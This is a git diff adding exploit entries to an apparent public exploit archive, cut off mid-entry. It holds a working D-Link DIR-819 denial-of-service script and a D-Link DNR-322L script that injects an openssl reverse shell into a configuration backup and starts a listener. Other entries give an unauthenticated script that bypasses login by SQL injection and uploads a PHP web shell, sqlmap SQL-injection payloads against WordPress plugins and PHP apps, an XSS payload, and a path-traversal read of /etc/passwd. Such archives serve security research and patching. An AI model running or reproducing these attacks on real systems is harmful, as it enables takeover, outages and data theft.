diff --git a/exploits/asp/webapps/51055.txt b/exploits/asp/webapps/51055.txt
new file mode 100644
index 000000000..e17e7d8a4
--- /dev/null
+++ b/exploits/asp/webapps/51055.txt
@@ -0,0 +1,17 @@
+# Exploit Title: Password Manager for IIS v2.0 - XSS
+# Exploit Author: VP4TR10T
+# Vendor Homepage: http://passwordmanager.adiscon.com/en/manual/
+# Software Link: http://passwordmanager.adiscon.com/
+<http://passwordmanager.adiscon.com/>
+# Version: *Version 2.0
+# Tested on: WINDOWS
+# CVE : CVE-2022-36664
+
+
+Affected URI (when changing user password):
+POST /isapi/PasswordManager.dll HTTP/1.1
+
+Affected Parameter in http
+payload:*ReturnURL*=<script>alert(document.cookie)</script>
+
+*Cordially,*
\ No newline at end of file
diff --git a/exploits/hardware/dos/51053.txt b/exploits/hardware/dos/51053.txt
new file mode 100644
index 000000000..cfe28b3db
--- /dev/null
+++ b/exploits/hardware/dos/51053.txt
@@ -0,0 +1,109 @@
+# Exploit Title: DLink DIR 819 A1 - Denial of Service
+# Date: 30th September, 2022
+# Exploit Author: @whokilleddb (https://twitter.com/whokilleddb)
+# Vendor Homepage: https://www.dlink.com/en/products/dir-819-wireless-ac750-dual-band-router
+# Version: DIR-819 (Firmware Version : 1.06 Hardware Version : A1)
+# Tested on: Firmware Version - 1.06 Hardware Version - A1
+# CVE : CVE-2022-40946
+#
+# Github: https://github.com/whokilleddb/dlink-dir-819-dos
+#
+# $ ./exploit.py -i 192.168.0.1
+# [+] DLink DIR-819 DoS exploit
+# [i] Address to attack: 192.168.0.1
+# [i] Using SSL:         False
+# [i] Request Timeout:   30s
+# [i] Buffer Length:     19
+# [i] Payload:           http://192.168.0.1/cgi-bin/webproc?getpage=html/index.html&errorpage=html/error.html&var:language=en_us&var:menu=basic&var:page=Bas_wansum&var:sys_Token=6307226200704307522
+# [+] Exploit Successful!
+
+#!/usr/bin/env python3
+import sys
+import string
+import urllib3
+import requests
+import argparse
+import random
+import socket
+from rich import print
+
+
+# Disable SSL Warnings
+urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
+
+
+# Globals
+TIMEOUT = 30
+#BUFFER_LEN = 19
+BUFFER_LEN = 32
+
+# Class to exploit
+class Exploit:
+    def __init__(self, ip, is_ssl):
+        """Initialize the constructor"""
+
+        self.ip = ip
+        self.is_ssl = is_ssl
+
+        _payload = f"{self.ip}/cgi-bin/webproc?getpage=html/index.html&errorpage=html/error.html&var:language=en_us&var:menu=basic&var:page=Bas_wansum&var:sys_Token={''.join(x for x in random.choices(string.digits, k=BUFFER_LEN))}"
+
+        if self.is_ssl:
+            self.payload = f"https://{_payload}"
+        else:
+            self.payload = f"http://{_payload}"
+
+
+    def show(self):
+        """Show the parameters"""
+
+        print(f"[bold][[cyan]i[/cyan]] Address to attack: [green]{self.ip}[/green][/bold]")
+        print(f"[bold][[cyan]i[/cyan]] Using SSL:         [green]{self.is_ssl}[/green][/bold]")
+        print(f"[bold][[cyan]i[/cyan]] Request Timeout:   [green]{TIMEOUT}s[/green][/bold]")
+        print(f"[bold][[cyan]i[/cyan]] Buffer Length:     [green]{BUFFER_LEN}[/green][/bold]")
+        print(f"[bold][[cyan]i[/cyan]] Payload:           [green]{self.payload}[/green][/bold]")
+
+
+    def run(self):
+        """Run the exploit"""
+        print(f"[bold][[magenta]+[/magenta]] DLink DIR-819 DoS exploit[/bold]")
+        self.show()
+
+        try:
+            r = requests.get(self.payload, verify=False, timeout=TIMEOUT)
+            if "Internal Error" in r.text:
+                print(f"[bold][[green]+[/green]] Exploit Successful![/bold]")
+                print(f"[bold][[green]+[/green]] Router services must be down![/bold]")
+            else:
+                print(f"[bold][[red]![/red]] Exploit Failed :([/bold]")
+
+        except requests.exceptions.Timeout:
+            print(f"[bold][[green]+[/green]] Exploit Successful![/bold]")
+
+        except Exception as e:
+            print(f"Error occured as: {e}")
+
+
+def main():
+    """Main function to run"""
+
+    parser = argparse.ArgumentParser(
+        description="DLink DIR-819 Unauthenticated DoS")
+    parser.add_argument('-i', '--ip', required=True, help="IP of the router")
+    parser.add_argument('-s', '--ssl', required=False, action="store_true")
+
+    opts = parser.parse_args()
+
+    try:
+        ip = socket.gethostbyname(opts.ip)
+    except socket.error:
+        print("[bold red][!] Invalid IP address[/bold red]", file=sys.stderr)
+        return
+
+    is_ssl = opts.ssl
+
+    exploit = Exploit(ip, is_ssl)
+    exploit.run()
+
+
+if __name__ == '__main__':
+    main()
\ No newline at end of file
diff --git a/exploits/hardware/remote/51046.txt b/exploits/hardware/remote/51046.txt
new file mode 100644
index 000000000..a2e2ecbae
--- /dev/null
+++ b/exploits/hardware/remote/51046.txt
@@ -0,0 +1,271 @@
+# Exploit Title: D-Link DNR-322L <=2.60B15 - Authenticated Remote Code Execution
+# Date: 13.09.2022
+# Exploit Author: luka <luka@lukasec.ch>
+# Exploit Writeup: https://lukasec.ch/posts/dlink_dnr322.html
+# Vendor Homepage: https://dlink.com
+# Vendor Advisory: https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10305
+# Software Link: http://legacyfiles.us.dlink.com/DNR-322L/REVA/FIRMWARE
+# Version: <= 2.60B15
+# Tested on: Debian, Windows 10
+
+"""
+# Vulnerability
+Inside the configuration backup from "Maintenance/System/Configuration Settings" is the bash script "rc.init.sh". The device does not check the integrity of a restored configuration backup which enables editing of set bash script. This bash script will be executed when the device boots.
+
+# Usage
+exploit.py [-h] -U USERNAME [-P PASSWORD] -t TARGET -l LHOST -p LPORT
+
+options:
+  -h, --help            show this help message and exit
+  -U USERNAME, --username USERNAME
+                        Username, ex: admin
+  -P PASSWORD, --password PASSWORD
+                        Password for the specified user
+  -t TARGET, --target TARGET
+                        IP of the target, ex: 192.168.99.99
+  -l LHOST, --lhost LHOST
+                        IP for the reverse shell to connect back to, ex: 123.123.123.123
+  -p LPORT, --lport LPORT
+                        Port for the reverse shell to connect back to, ex: 8443
+"""
+
+import argparse, socket, requests, base64, urllib, os, shutil, tarfile, random, string
+from ipaddress import ip_address
+
+args = argparse.ArgumentParser()
+
+args.add_argument(
+    "-U",
+    "--username",
+    type=str,
+    required=True,
+    dest="username",
+    help="Username, ex: admin",
+)
+
+args.add_argument(
+    "-P",
+    "--password",
+    type=str,
+    required=False,
+    dest="password",
+    help="Password for the specified user",
+)
+
+args.add_argument(
+    "-t",
+    "--target",
+    type=str,
+    required=True,
+    dest="target",
+    help="IP of the target, ex: 192.168.99.99",
+)
+
+args.add_argument(
+    "-l",
+    "--lhost",
+    type=str,
+    required=True,
+    dest="lhost",
+    help="IP for the reverse shell to connect back to, ex: 123.123.123.123",
+)
+
+args.add_argument(
+    "-p",
+    "--lport",
+    type=int,
+    required=True,
+    dest="lport",
+    help="Port for the reverse shell to connect back to, ex: 8443",
+)
+
+args = args.parse_args()
+
+# base64 + url encode string
+# returns string
+def b64_url_encode(data):
+    enc = data.encode("utf-8")
+    encB = base64.b64encode(enc)
+    encUrl = urllib.parse.quote(str(encB, "utf-8"))
+    return encUrl
+
+
+# since user input is always unsafe, test IPs
+try:
+    ip_address(args.target)
+except Exception:
+    print("[!] Target IP is not a valid IP address")
+    exit(1)
+try:
+    ip_address(args.lhost)
+except Exception:
+    print("[!] Reverse shell IP is not a valid IP address")
+    exit(1)
+
+# check if target is online
+try:
+    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+    s.settimeout(2)
+    # hardcoded http, change if needed
+    s.connect((args.target, 80))
+    s.close()
+except Exception:
+    print("[!] Target is not online")
+    exit(1)
+print("[+] Target is online")
+
+# login param
+authUrl = "http://" + args.target + "/cgi-bin/login_mgr.cgi"
+authHeaders = {"content-type": "application/x-www-form-urlencoded"}
+authCheckCmd = "cmd=ui_check_wto"
+
+session = requests.Session()
+
+# if password is empty supply dont supply anything
+if not args.password:
+    authBody = (
+        "cmd=login&port=&mydlink=0&protocol=0&R_language=en&username="
+        + args.username
+        + "&pwd=&ssl_port=443&f_login_type=0&f_url="
+    )
+else:
+    authBody = (
+        "cmd=login&port=&mydlink=0&protocol=0&R_language=en&username="
+        + args.username
+        + "&pwd="
+        + b64_url_encode(args.password)
+        + "&ssl_port=443&f_login_type=0&f_url="
+    )
+
+try:
+    # login
+    reqLogin = session.post(authUrl, headers=authHeaders, data=authBody)
+    # check if successful
+    reqCheck = session.post(authUrl, headers=authHeaders, data=authCheckCmd)
+
+    if "success" in reqCheck.text:
+        print("[+] Login successful")
+    else:
+        print("[!] Error during login, check credentials")
+        exit(1)
+except Exception as error:
+    print(error)
+    print("[!] Error during login, check credentials")
+    exit(1)
+
+# download backup
+print("[*] Downloading backup")
+if os.path.exists("backup_clean"):
+    os.remove("backup_clean")
+
+# download param
+downloadUrl = "http://" + args.target + "/cgi-bin/system_mgr.cgi"
+downloadHeaders = {"content-type": "application/x-www-form-urlencoded"}
+downloadCmd = "cmd=cgi_backup_conf"
+
+try:
+    reqBackup = session.post(downloadUrl, headers=downloadHeaders, data=downloadCmd)
+except Exception as error:
+    print(error)
+    print("[!] Error while downloading backup")
+    exit(1)
+
+# saving to disk
+try:
+    f = open("backup_clean", "wb")
+    f.write(reqBackup.content)
+    f.close()
+
+    if not os.path.exists("backup_clean"):
+        print("[!] Error while saving backup")
+        exit(1)
+except Exception as error:
+    print(error)
+    print("[!] Error while saving backup")
+    exit(1)
+print("[+] Download successful")
+
+# unpack backup (tar.gz file)
+try:
+    config = tarfile.open("backup_clean")
+    config.extractall()
+    config.close()
+except Exception as error:
+    print(error)
+    print("[!] Error while unpacking backup")
+    exit(1)
+
+# inject stuff into startup script
+try:
+    bashscript = open("backup/rc.init.sh", "a")
+    # revshell with openssl
+    payload = (
+        "\n(( sleep 10; rm -f /tmp/lol; mknod /tmp/lol p; cat /tmp/lol | /bin/ash -i 2>&1 | openssl s_client -quiet -connect %s:%s >/tmp/lol & ) & )\n"
+        % (args.lhost, args.lport)
+    )
+    bashscript.write(payload)
+    # also start a telnet deamon (has same passwd as web)
+    # bashscript.write("utelnetd -d")
+    bashscript.close()
+except Exception as error:
+    print(error)
+    print("[!] Error while creating malicious backup")
+    exit(1)
+print("[+] Created malicious backup")
+
+
+# re pack file
+try:
+    configInj = tarfile.open("backup_injected", "w:gz")
+    configInj.add("backup")
+    configInj.close()
+    # remove unpacked folder
+    shutil.rmtree("backup", ignore_errors=False, onerror=None)
+except Exception as error:
+    print(error)
+    print("[!] Error while re-packing malicious backup")
+    exit(1)
+
+# upload
+print("[*] Uploading malicious backup")
+uploadUrl = "http://" + args.target + "/cgi-bin/system_mgr.cgi"
+uploadHeaders = {
+    "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryhellothere"
+}
+
+configInj = open("backup_injected", "rb")
+tardata = configInj.read().decode("latin-1")
+
+uploadBody = (
+    '------WebKitFormBoundaryhellothere\r\nContent-Disposition: form-data; name="cmd"\r\n\r\ncgi_restore_conf\r\n------WebKitFormBoundaryhellothere\r\nContent-Disposition: form-data; name="file"; filename="backup"\r\nContent-Type: application/x-gzip\r\n\r\n'
+    + tardata
+    + "\r\n------WebKitFormBoundaryhellothere--\r\n"
+)
+
+reqUpload = session.post(uploadUrl, headers=uploadHeaders, data=uploadBody)
+
+if "web/dsk_mgr/wait.html" in reqUpload.text:
+    print("[+] Upload successful, target will reboot now")
+else:
+    print("[!] Error while uploading malicious backup")
+    exit(1)
+
+
+# creating listener
+print("[*] Started listener, waiting for the shell to connect back")
+print("[*] When you are done kill the shell with Ctrl+C")
+# random name
+randInt = "".join(random.choice(string.ascii_lowercase) for i in range(10))
+
+# generate the cert and the key for the openssl listener
+os.system(
+    'openssl req -x509 -newkey rsa:4096 -keyout /tmp/%s_key.pem -out /tmp/%s_cert.pem -days 365 -nodes -subj "/CN=example.com" 2> /dev/null'
+    % (randInt, randInt)
+)
+# create an openssl listener
+os.system(
+    "openssl s_server -quiet -key /tmp/%s_key.pem -cert /tmp/%s_cert.pem -port %s"
+    % (randInt, randInt, args.lport)
+)
+
+exit(0)
\ No newline at end of file
diff --git a/exploits/php/webapps/51042.txt b/exploits/php/webapps/51042.txt
new file mode 100644
index 000000000..1c7b94c48
--- /dev/null
+++ b/exploits/php/webapps/51042.txt
@@ -0,0 +1,26 @@
+# Exploit Title: NEX-Forms WordPress plugin < 7.9.7 - Authenticated SQLi
+# Exploit Author: Elias Hohl
+# Date: 2022-08-01
+# Vendor Homepage: https://basixonline.net
+# Software Link: https://wordpress.org/plugins/nex-forms-express-wp-form-builder/
+# Tested on: Ubuntu 20.04
+# CVE : CVE-2022-3142
+
+Authenticated SQL injection vulnerability in the "NEX Forms" Wordpress plugin
+
+https://medium.com/@elias.hohl/authenticated-sql-injection-vulnerability-in-nex-forms-wordpress-plugin-35b8558dd0f5
+
+1. Start a new Wordpress instance using docker-compose.
+
+2. Install the NEX Forms plugin.
+
+3. Open the URL "/wp-admin/admin.php?page=3Dnex-forms-dashboard&form_id=3D1" in your browser. Save the request to "nex-forms-req.txt" via Burp Suite.
+
+4. Execute the following command: sqlmap -r nex_forms_req.txt -p form_id --technique=3DT --dbms=3Dmysql --level 5 --risk 3
+sqlmap will find a time-based blind payload:
+
+
+Parameter: form_id (GET)
+    Type: time-based blind
+    Title: MySQL >=3D 5.0.12 AND time-based blind (query SLEEP)
+    Payload: page=3Dnex-forms-dashboard&form_id=3D1 AND (SELECT 4715 FROM (SELECT(SLEEP(5)))nPUi)
\ No newline at end of file
diff --git a/exploits/php/webapps/51043.txt b/exploits/php/webapps/51043.txt
new file mode 100644
index 000000000..b151275eb
--- /dev/null
+++ b/exploits/php/webapps/51043.txt
@@ -0,0 +1,34 @@
+# Exploit Title: Translatepress Multilinugal WordPress plugin < 2.3.3 - Authenticated SQL Injection
+# Exploit Author: Elias Hohl
+# Date: 2022-07-23
+# Vendor Homepage: https://translatepress.com/
+# Software Link: https://wordpress.org/plugins/translatepress-multilingual/
+# Version: < 2.3.3
+# Tested on: Ubuntu 20.04
+# CVE : CVE-2022-3141
+
+Authenticated SQL injection vulnerability in "Translatepress Multilingual" Wordpress plugin
+
+https://medium.com/@elias.hohl/authenticated-sql-injection-vulnerability-in-translatepress-multilingual-wordpress-plugin-effc08eda514
+
+1. Start a new Wordpress instance using docker-compose.
+
+2. Install the translatepress-multilingual plugin. Important note: If there are more than two languages allowed in a kind of premium plan, the exploit might be slightly different. We might need to insert deletion requests between each injection to prevent payloads being executed again. Also note that the en_us_en_gb dictionary table must exist. You might need to add these languages first so the table gets created.
+
+3. Connect your browser to Burp Suite, log in to Wordpress and add any language from the dropdown (the url to do this is /wp-admin/options-general.php?page=translate-press). In Burp Suite, do a right click→ copy to file, and save it as translatepress_req.txt.
+
+4. Go to /sample-page/?trp-edit-translation=preview (a URL to translate an arbitrary post). Again, in Burp Suite do a right mouse click → save to file, and save it as translatepress_req_2.txt.
+
+5. Attack using sqlmap: sqlmap -r translatepress_req.txt -p trp_settings%5Btranslation-languages%5D%5B%5D --dbms=mysql --second-req translatepress_req_2.txt --technique=T --level 5 --risk 3
+
+
+sqlmap will find a time-based blind payload:
+
+
+Parameter: trp_settings[translation-languages][] (POST)
+
+Type: time-based blind
+
+Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+
+Payload: option_page=trp_settings&action=update&_wpnonce=ca410d0e89&_wp_http_referer=/wp-admin/options-general.php?page=translate-press%26settings-updated=true&trp_settings[default-language]=en_US&trp_settings[publish-languages][]=en_US&trp_settings[translation-languages][]=en_US&trp_settings[translation-languages-formality][]=default&trp_settings[url-slugs][en_US]=en_us&trp_settings[translation-languages][]=en_GB WHERE 4372=4372 AND (SELECT 6967 FROM (SELECT(SLEEP(5)))ZDtR)-- bsZU&trp_settings[publish-languages][]=en_GB&trp_settings[translation-languages-formality][]=default&trp_settings[url-slugs][en_GB]=en&trp_settings[native_or_english_name]=english_name&trp_settings[add-subdirectory-to-default-language]=no&trp_settings[force-language-to-custom-links]=yes&trp_settings[shortcode-options]=flags-full-names&trp_settings[menu-options]=flags-full-names&trp_settings[trp-ls-floater]=yes&trp_settings[floater-options]=flags-full-names&trp_settings[floater-color]=dark&trp_settings[floater-position]=bottom-right&trp_email_course_email=
\ No newline at end of file
diff --git a/exploits/php/webapps/51045.txt b/exploits/php/webapps/51045.txt
new file mode 100644
index 000000000..70342761c
--- /dev/null
+++ b/exploits/php/webapps/51045.txt
@@ -0,0 +1,80 @@
+# Exploit Title: Online Diagnostic Lab Management System v1.0 - Remote Code Execution (RCE) (Unauthenticated)
+# Google Dork: N/A
+# Date: 2022-9-23
+# Exploit Author: yousef alraddadi - https://twitter.com/y0usef_11
+# Vendor Homepage: https://www.sourcecodester.com/php/15667/online-diagnostic-lab-management-system-using-php-and-mysql-free-download.html
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/mayuri_k/diagnostic_0.zip
+# Tested on: windows 11 - XAMPP
+# Version: 1.0
+# Authentication Required: bypass login with sql injection
+
+#/usr/bin/python3
+
+import requests
+import os
+import sys
+import time
+import random
+
+# clean screen
+os.system("cls")
+os.system("clear")
+
+logo = '''
+##################################################################
+#                                                                                                                                            #
+#    Exploit Script ( Online Diagnostic Lab Management System )                             #
+#                                                                                                                                            #
+##################################################################
+'''
+print(logo)
+
+url = str(input("Enter website url : "))
+username = ("' OR 1=1-- -")
+password = ("test")
+
+req = requests.Session()
+
+target = url+"/diagnostic/login.php"
+data = {'username':username,'password':password}
+
+website = req.post(target,data=data)
+files = open("rev.php","w")
+payload = "<?php system($_GET['cmd']);?>"
+files.write(payload)
+files.close()
+
+hash = random.getrandbits(128)
+name_file = str(hash)+".php"
+if "Login Successfully" in website.text:
+
+    print("[+] Login Successfully")
+    website_1 = url+"/diagnostic/php_action/createOrder.php"
+
+    upload_file = {
+        "orderDate": (None,""),
+        "clientName": (None,""),
+        "clientContact" : (None,""),
+        "productName[]" : (None,""),
+        "rateValue[]" : (None,""),
+        "quantity[]" : (None,""),
+        "totalValue[]" : (None,""),
+        "subTotalValue" : (None,""),
+        "totalAmountValue" : (None,""),
+        "discount" : (None,""),
+        "grandTotalValue" : (None,""),
+        "gstn" : (None,""),
+        "vatValue" : (None,""),
+        "paid" : (None,""),
+        "dueValue" : (None,""),
+        "paymentType" : (None,""),
+        "paymentStatus" : (None,""),
+        "paymentPlace" : (None,""),
+        "productImage" : (name_file,open("rev.php","rb"))
+        }
+
+    up = req.post(website_1,files=upload_file)
+    print("[+] Check here file shell => "+url+"/diagnostic/assets/myimages/"+name_file)
+    print("[+] can exect command here => "+url+"/diagnostic/assets/myimages/"+name_file+"?cmd=whoami")
+else:
+    print("[-] Check username or password")
\ No newline at end of file
diff --git a/exploits/php/webapps/51047.txt b/exploits/php/webapps/51047.txt
new file mode 100644
index 000000000..35a3a0ebe
--- /dev/null
+++ b/exploits/php/webapps/51047.txt
@@ -0,0 +1,80 @@
+# Exploit Title: Human Resources Management System v1.0 - Multiple SQLi
+# Date: 16/03/2023
+# Exploit Author: Abdulhakim Öner
+# Vendor Homepage: https://www.sourcecodester.com
+# Software Link: https://www.sourcecodester.com/php/15740/human-resource-management-system-project-php-and-mysql-free-source-code.html
+# Software Download: https://www.sourcecodester.com/sites/default/files/download/oretnom23/hrm.zip
+# Version: 1.0
+# Tested on: Windows
+
+## Description
+A Blind SQL injection vulnerability in the login page (/hrm/controller/login.php) in Human Resources Management System allows remote unauthenticated attackers to execute remote command through arbitrary SQL commands by "name" parameter.
+
+## Request PoC
+```
+POST /hrm/controller/login.php HTTP/1.1
+Host: 192.168.1.103
+Accept-Encoding: gzip, deflate
+Accept: */*
+Accept-Language: en-US;q=0.9,en;q=0.8
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36
+Connection: close
+Cache-Control: max-age=0
+Referer: http://192.168.1.103/hrm/
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 73
+
+name=test@testdomain.com'&password=test&submit=Sign+In
+
+```
+
+This request causes an error. Adding "'%2b(select*from(select(sleep(20)))a)%2b'" to the end of "name" parameter, the response to request was 302 status code with message of Found, but 20 seconds later, which indicates that our sleep 20 command works.
+
+```
+POST /hrm/controller/login.php HTTP/1.1
+Host: 192.168.1.103
+Accept-Encoding: gzip, deflate
+Accept: */*
+Accept-Language: en-US;q=0.9,en;q=0.8
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36
+Connection: close
+Cache-Control: max-age=0
+Referer: http://192.168.1.103/hrm/
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 114
+
+name=test@testdomain.com'%2b(select*from(select(sleep(20)))a)%2b'&password=test&submit=Sign+In
+
+```
+
+## Exploit with sqlmap
+Save the request from burp to file
+```
+┌──(root㉿caesar)-[/home/kali/Workstation/hrm]
+└─# sqlmap -r sqli.txt -p 'name' --batch --dbs --level=3 --risk=2
+---snip----
+[15:49:36] [INFO] testing 'MySQL UNION query (89) - 81 to 100 columns'
+POST parameter 'name' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
+sqlmap identified the following injection point(s) with a total of 838 HTTP(s) requests:
+---
+Parameter: name (POST)
+    Type: boolean-based blind
+    Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
+    Payload: name=test@testdomain.com' AND 3287=(SELECT (CASE WHEN (3287=3287) THEN 3287 ELSE (SELECT 8737 UNION SELECT 2671) END))-- -&password=a5P!s3v!K8&submit=Sign In
+
+    Type: error-based
+    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
+    Payload: name=test@testdomain.com' OR (SELECT 6958 FROM(SELECT COUNT(*),CONCAT(0x717a766b71,(SELECT (ELT(6958=6958,1))),0x716b786271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- VHwA&password=a5P!s3v!K8&submit=Sign In
+
+    Type: time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+    Payload: name=test@testdomain.com' AND (SELECT 1760 FROM (SELECT(SLEEP(5)))LTmV)-- fhJt&password=a5P!s3v!K8&submit=Sign In
+---
+[15:49:36] [INFO] the back-end DBMS is MySQL
+web application technology: PHP 8.2.0, Apache 2.4.54, PHP
+----snip----
+
+```
+
+
+## The "password" parameter in the POST request is also vulnerable. It can be exploited in the same way.
\ No newline at end of file
diff --git a/exploits/php/webapps/51048.txt b/exploits/php/webapps/51048.txt
new file mode 100644
index 000000000..0a9c12628
--- /dev/null
+++ b/exploits/php/webapps/51048.txt
@@ -0,0 +1,71 @@
+# Exploit Title: Yoga Class Registration System v1.0 - Multiple SQLi
+# Date: 19/03/2023
+# Exploit Author: Abdulhakim Öner
+# Vendor Homepage: https://www.sourcecodester.com
+# Software Link: https://www.sourcecodester.com/php/16097/yoga-class-registration-system-php-and-mysql-free-source-code.html
+# Software Download: https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-ycrs.zip
+# Version: 1.0
+# Tested on: Windows, Linux
+
+## Description
+A Blind SQL injection vulnerability in the "cid" parameter in Online Pizza Ordering System allows remote unauthenticated attackers to dump database through arbitrary SQL commands.
+
+## Request PoC
+```
+GET /php-ycrs/?p=yclasses%2fregistration&cid=2' HTTP/1.1
+Host: 192.168.1.101
+Accept-Encoding: gzip, deflate
+Accept: */*
+Accept-Language: en-US;q=0.9,en;q=0.8
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36
+Connection: close
+Cache-Control: max-age=0
+Referer: http://192.168.1.101/php-ycrs/?p=yclasses%2fview_class&id=2
+Cookie: PHPSESSID=1pbq6ushdtnf0o5oqhdcv81l4v
+
+```
+
+This request causes a Fatal Error in the webapp. Adding "'%2b(select*from(select(sleep(10)))a)%2b'" to the end of "cid" parameter, the response to request was 200 status code with message of OK, but 10 seconds later, which indicates that our sleep 10 command works.
+
+```
+GET /php-ycrs/?p=yclasses%2fregistration&cid=2'%2b(select*from(select(sleep(20)))a)%2b' HTTP/1.1
+Host: 192.168.1.101
+Accept-Encoding: gzip, deflate
+Accept: */*
+Accept-Language: en-US;q=0.9,en;q=0.8
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36
+Connection: close
+Cache-Control: max-age=0
+Referer: http://192.168.1.101/php-ycrs/?p=yclasses%2fview_class&id=2
+Cookie: PHPSESSID=1pbq6ushdtnf0o5oqhdcv81l4v
+
+```
+
+## Exploit with sqlmap
+Save the request from burp to file
+```
+sqlmap -r sqli.txt -p 'cid' --batch --dbs --level=3 --risk=2
+
+---snip---
+GET parameter 'cid' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
+sqlmap identified the following injection point(s) with a total of 302 HTTP(s) requests:
+---
+Parameter: cid (GET)
+    Type: boolean-based blind
+    Title: AND boolean-based blind - WHERE or HAVING clause
+    Payload: p=yclasses/registration&cid=2' AND 5068=5068-- JfDq
+
+    Type: error-based
+    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
+    Payload: p=yclasses/registration&cid=2' AND (SELECT 3800 FROM(SELECT COUNT(*),CONCAT(0x717a7a6b71,(SELECT (ELT(3800=3800,1))),0x7170787171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- hjLV
+
+    Type: time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+    Payload: p=yclasses/registration&cid=2' AND (SELECT 6005 FROM (SELECT(SLEEP(5)))kQyZ)-- btnY
+---
+[16:00:10] [INFO] the back-end DBMS is MySQL
+web application technology: Apache 2.4.54, PHP 8.2.0
+---snip---
+```
+
+## The "id" parameter in "/php-ycrs/?p=yclasses%2fview_class&id=1" and "/php-ycrs/admin/?page=classes%2fmanage_class&id=2" are also vulnerable. It can be exploited in the same way.
\ No newline at end of file
diff --git a/exploits/php/webapps/51049.txt b/exploits/php/webapps/51049.txt
new file mode 100644
index 000000000..7544e5d01
--- /dev/null
+++ b/exploits/php/webapps/51049.txt
@@ -0,0 +1,58 @@
+## Exploit Title: Employee Performance Evaluation System v1.0 - File Inclusion and RCE
+## Exploit Author: nu11secur1ty
+## Date: 03.17.2023
+## Vendor: https://www.sourcecodester.com/user/257130/activity
+## Software: https://www.sourcecodester.com/php/14617/employee-performance-evaluation-system-phpmysqli-source-code.html
+## Reference: https://brightsec.com/blog/file-inclusion-vulnerabilities/
+
+## Description:
+The Employee Performance Evaluation System-1.0 suffer from File
+Inclusion - RCE Vulnerabilities.
+The usual user of this system is allowed to submit a malicious file or
+upload a malicious file to the server.
+After then this user can execute remotely the already malicious
+included file on the server of the victim. This can bring the system
+to disaster or can destroy all information that is inside or this
+information can be stolen.
+
+STATUS: CRITICAL Vulnerability
+
+
+[+]Get Info:
+
+```PHP
+<?php
+// by nu11secur1ty - 2023
+	phpinfo();
+?>
+
+```
+[+]Exploit:
+
+```PHP
+<?php
+// by nu11secur1ty - 2023
+// Old Name Of The file
+$old_name = "C:/xampp7/htdocs/pwnedhost7/epes/" ;
+
+// New Name For The File
+$new_name = "C:/xampp7/htdocs/pwnedhost7/epes15/" ;
+
+// using rename() function to rename the file
+rename( $old_name, $new_name) ;
+
+?>
+```
+
+## Proof Of Concept:
+https://github.com/nu11secur1ty/CVE-nu11secur1ty/upload/main/vendors/oretnom23/2023/Employee-Performance-Evaluation-1.0
+
+--
+System Administrator - Infrastructure Engineer
+Penetration Testing Engineer
+Exploit developer at https://packetstormsecurity.com/
+https://cve.mitre.org/index.html
+https://cxsecurity.com/ and https://www.exploit-db.com/
+0day Exploit DataBase https://0day.today/
+home page: https://www.nu11secur1ty.com/hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
+nu11secur1ty <http://nu11secur1ty.com/>
\ No newline at end of file
diff --git a/exploits/php/webapps/51050.txt b/exploits/php/webapps/51050.txt
new file mode 100644
index 000000000..fb91f0efe
--- /dev/null
+++ b/exploits/php/webapps/51050.txt
@@ -0,0 +1,66 @@
+## Exploit Title: Lavalite v9.0.0 - XSRF-TOKEN cookie File path traversal
+## Exploit Author: nu11secur1ty
+## Date: 09.29.2022
+## Vendor: https://lavalite.org/
+## Software: https://github.com/LavaLite/cms/releases/tag/v9.0.0
+## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/LavaLite
+
+
+## Description:
+The XSRF-TOKEN cookie is vulnerable to path traversal attacks,
+enabling read access to arbitrary files on the server.
+The payload ../../../../../../../../../../../../../../../../etc/passwd[0x00]eyJpdiI6InhwNlhibUc0K3hrL3RQdHZNYlp5Qnc9PSIsInZhbHVlIjoiU2daQ2YzeFNWSjN4OHZNdEZSMlhiOVpkbGUweDdKSDdXbXc1eitGc3RSTXNFTFBqUGR1ekJOSitUTjcyWVRYTkVzV2lpMDkxb3FHM2k5S1Y2VlZZRGVVN2h2WkpJeGcxZVluVDhrdDkvUDgxN2hTNjY5elRtQllheDlPOEM5aGgiLCJtYWMiOiI4ZDBkMjI0NmFkNDQ2YTA5ZjhkNDI0ZjdhODk0NWUzMjY2OTIxMjRmMzZlZjI4YWMwNmRiYTU5YzRiODE5MDk5IiwidGFnIjoiIn0=
+was submitted in the XSRF-TOKEN cookie.
+The requested file was returned in the application's response. The
+malicious user can get very sensitive information from this CMS
+system.
+
+STATUS: HIGH Vulnerability
+
+[+]Payload:
+
+```POST
+GET /cms-master/website/public/about.html HTTP/1.1
+Host: pwnedhost.com
